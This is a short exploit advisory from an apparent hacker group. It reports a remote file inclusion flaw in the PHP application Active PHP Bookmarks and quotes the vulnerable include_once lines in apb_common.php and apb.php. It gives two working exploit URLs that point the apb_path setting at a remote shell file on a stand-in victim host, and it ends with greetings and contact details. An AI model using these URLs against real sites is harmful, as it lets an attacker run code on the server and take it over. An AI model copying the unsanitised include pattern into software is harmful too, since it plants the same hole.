|
Title : Active PHP Bookmarks (apb.php) Remote file include
########################################################################
#######
Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}
------------------------------------------------------------------------
Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------
-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_path']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=Shell.txt?
------------------------------------------------------------------------
----
greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends
Special Greeting:AsbMay's Group
channel:www.asb-may.net
contact:spoonman500[at]hotmail[dot]com
_________________________________________________________________
Testez Windows Llive Mail Beta !
http://www.msn.fr/newhotmail/Default.asp?Ath=f